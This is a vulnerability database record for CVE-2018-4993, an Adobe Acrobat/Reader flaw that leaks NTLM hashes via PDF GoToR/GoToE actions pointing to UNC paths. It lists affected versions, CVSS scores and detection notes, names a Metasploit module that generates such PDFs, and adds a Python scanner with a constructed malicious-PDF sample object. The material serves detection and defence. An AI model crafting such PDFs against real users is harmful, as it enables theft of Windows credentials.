cbcvebase.
CVE-2018-4993
published 2018-07-09

CVE-2018-4993: Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft…

Priority: P2 68 high
CVSS 3.0: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Exploit: available
EPSS: 86.52% (99.7th percentile)
Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an NTLM SSO hash theft vulnerability. Successful exploitation could lead to information disclosure.

Affected (7 ranges)

Vendor        Product              Version range                  Fixed in
adobe         acrobat_dc           15.006.30060 – 15.006.30417
adobe         acrobat_dc           15.008.20082 – 18.011.20038
adobe         acrobat_dc           17.011.30059 – 17.011.30079
adobe         acrobat_reader_dc    15.006.30060 – 15.006.30417
adobe         acrobat_reader_dc    15.008.20082 – 18.011.20038
adobe         acrobat_reader_dc    17.011.30059 – 17.011.30079
pdf-xchange   pdf-xchange_editor   < 8.0.330.0                    8.0.330.0

Detection & IOCs (extracted from sources)

command: /S /GoToR
  • Look for PDF files containing /AA (Additional Actions) dictionary entries with /O (page open) actions of type /S /GoToR or /S /GoToE whose /F field points to a UNC path (\\server\share). Opening such a file triggers automatic NTLM credential leakage to an attacker-controlled SMB server.
  • The incomplete May 2018 patch (APSB18-09) only fixed the GoToR action type; malicious PDFs exploiting the unpatched GoToE (GoToEmbedded) action type bypass the fix and were observed in the wild (submitted to VirusTotal in May 2018).
  • The Metasploit module 'auxiliary/fileformat/badpdf' generates malicious PDFs embedding a UNC link for NetNTLM credential capture; hunt for PDF files created by or matching the structure of this module.
  • Both GoToR (GoToRemote) and GoToE (GoToEmbedded) action types are vulnerable; the May 2018 patch (APSB18-09) only addressed GoToR. Detections must cover both /S /GoToR and /S /GoToE in PDF /AA dictionaries to avoid missing the bypass variant (CVE-2018-15979).
  • All Windows PDF viewers are affected, not just Adobe products; scope detection and blocking rules to cover any PDF reader process initiating SMB connections.
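An added detection example, not part of this record or of any vendor's tooling: a byte-level scanner for the structure the bullets above describe. It flags GoToR and GoToE actions whose /F decodes to a UNC path, handles both literal-string and hex-string /F values, and records (heuristically) whether the action hangs directly off a page-open /O or document /OpenAction trigger. The sample object, hostname and share name are constructed.

```python
import re
# Action types named above: GoToR (fixed in APSB18-09) and GoToE (the bypass).
RISKY_ACTION = re.compile(rb"/S\s*/(GoToR|GoToE)\b")
# /F as a literal string (...) or a hex string <...>, anywhere in the action dict
# (so a nested file-specification dictionary << /F (...) >> is covered too).
F_VALUE = re.compile(rb"/F\s*(?:\(((?:\\.|[^\\)])*)\)|<([0-9A-Fa-f\s]*)>)")

def _dict_span(data: bytes, pos: int):
    """(start, end) of the innermost << ... >> that contains pos, or None."""
    i, depth = pos, 0                          # walk back to the unmatched <<
    while i >= 0 and not (depth == 0 and data.startswith(b"<<", i)):
        tok = data[i:i + 2]
        depth += (tok == b">>") - (tok == b"<<")
        i -= 2 if tok in (b"<<", b">>") else 1
    if i < 0:
        return None
    j, depth = i, 0                            # walk forward to the matching >>
    while j < len(data):
        tok = data[j:j + 2]
        depth += (tok == b"<<") - (tok == b">>")
        j += 2 if tok in (b"<<", b">>") else 1
        if depth == 0:
            return i, j
    return None

def scan_pdf(data: bytes) -> list:
    """Return (action, path, auto_open) for each GoToR/GoToE action whose /F is a
    UNC path. Raw bytes only: objects in compressed /ObjStm streams must be inflated first."""
    findings = []
    for act in RISKY_ACTION.finditer(data):
        span = _dict_span(data, act.start())
        if span is None:
            continue
        for fm in F_VALUE.finditer(data, *span):
            if fm.group(1) is not None:        # literal string: drop escaping backslashes
                path = re.sub(rb"\\(.)", rb"\1", fm.group(1), flags=re.S)
            else:                              # hex string, odd length padded per spec
                hexdigits = re.sub(rb"\s", b"", fm.group(2)).decode()
                path = bytes.fromhex(hexdigits + "0" * (len(hexdigits) % 2))
            if path.startswith((b"\\\\", b"//")):   # \\host\share or //host/share
                auto = data[:span[0]].rstrip().endswith((b"/O", b"/OpenAction"))  # heuristic
                findings.append((act.group(1).decode(), path, auto))
    return findings

# Constructed sample object (not a real document): a page whose /AA /O action is
# a GoToE to a UNC path, the variant the APSB18-09 fix missed.
SAMPLE = (b"4 0 obj\n<< /Type /Page /Parent 2 0 R\n"
          b"   /AA << /O << /S /GoToE /F (\\\\\\\\fileserver.example\\\\share\\\\x.pdf) >> >>\n"
          b">>\nendobj\n")
```

Actions referenced indirectly (`/O 12 0 R`) are still flagged when the referenced dictionary is scanned, but the auto_open flag is then False.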

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.0      7.5     HIGH       CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd             v2.0      5.0     MEDIUM     AV:N/AC:L/Au:N/C:P/I:N/A:N
ghsa                      6.1     MEDIUM
vendor_redhat             6.1     MEDIUM